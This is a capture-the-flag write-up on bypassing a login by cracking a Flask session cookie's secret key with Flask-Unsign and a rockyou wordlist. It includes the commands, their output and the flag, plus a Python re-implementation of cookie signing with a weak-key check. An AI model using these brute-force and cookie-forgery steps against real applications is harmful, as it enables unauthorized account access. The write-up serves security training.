Author: Marin Radu
Bypass the login by tampering with Flask's session cookie.
Discover the secret key to access the flag.
- Flask cookie manipulation
Manipulate and crack the Flask session cookie using the Flask-Unsign tool.
A detailed guide and the necessary steps can be found on the Flask-Unsign GitHub page.
You'll need a substantial wordlist, like rockyou, to brute-force the secret key.
- Install Flask-Unsign with wordlist support:
pip3 install flask-unsign[wordlist]
- Decode the session cookie from the server (replace $URL with the challenge URL):
flask-unsign --decode --server '$URL'
Output:
[*] Server returned HTTP 403 (FORBIDDEN)
[+] Successfully obtained session cookie: ...
{'logged_in': False}
- Brute-force the secret key using the decoded cookie and a wordlist:
flask-unsign --unsign --cookie "..." --no-literal-eval -w /usr/share/wordlists/rockyou.txt
Output:
[*] Session decodes to: {'logged_in': False}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after ... attempts: '98765432123456789'
Flag: CSCTF{98765432123456789}
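As an added illustration (not part of the original writeup and not Flask-Unsign's code), the block below re-implements Flask's default session signing in plain Python, assumed to follow itsdangerous' URLSafeTimedSerializer defaults as Flask configures them (HMAC-SHA1, salt cookie-session, "hmac" key derivation). It shows why the secret key is the whole defence: whoever holds it can verify or mint sessions, so a guessable key like the one above is the real bug, and rotating to a high-entropy key invalidates every cookie signed under the old one. The function names and the weak-key heuristic are my own.

```python
import base64, hashlib, hmac, json, secrets, time
from typing import Optional

SALT = b"cookie-session"  # Flask's default session salt (assumed, see lead-in)

def _b64(raw: bytes) -> str:
    # URL-safe base64 without padding, as itsdangerous emits it
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def _derived_key(secret_key: str) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()

def sign_session(data: dict, secret_key: str, ts: Optional[int] = None) -> str:
    # payload . base64(timestamp) . base64(HMAC-SHA1(derived_key, payload.timestamp))
    payload = _b64(json.dumps(data, separators=(",", ":")).encode())
    ts = int(time.time()) if ts is None else ts
    value = f"{payload}.{_b64(ts.to_bytes((ts.bit_length() + 7) // 8, 'big'))}"
    sig = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    return f"{value}.{_b64(sig)}"

def verify_session(cookie: str, secret_key: str) -> Optional[dict]:
    # Returns the session dict only if the signature matches this key, else None
    try:
        value, sig = cookie.rsplit(".", 1)
        payload, _ts = value.split(".")
    except ValueError:
        return None  # malformed cookie
    expected = hmac.new(_derived_key(secret_key), value.encode(), hashlib.sha1).digest()
    if not hmac.compare_digest(_b64(expected), sig):
        return None
    pad = "=" * (-len(payload) % 4)
    return json.loads(base64.urlsafe_b64decode(payload + pad))

def is_weak_secret_key(secret_key: str, min_len: int = 32) -> bool:
    # Heuristic (my own): short keys or keys drawn from a tiny alphabet
    # (digits-only like the CTF key, or letters-only) fall to wordlist attacks
    return len(secret_key) < min_len or secret_key.isdigit() or secret_key.isalpha()

def generate_secret_key() -> str:
    # 256 bits from the OS CSPRNG; what app.secret_key should be set to
    return secrets.token_hex(32)
```

Session data is only integrity-protected, not encrypted: anything placed in the cookie is readable by the client, which is why the decode step above works without the key.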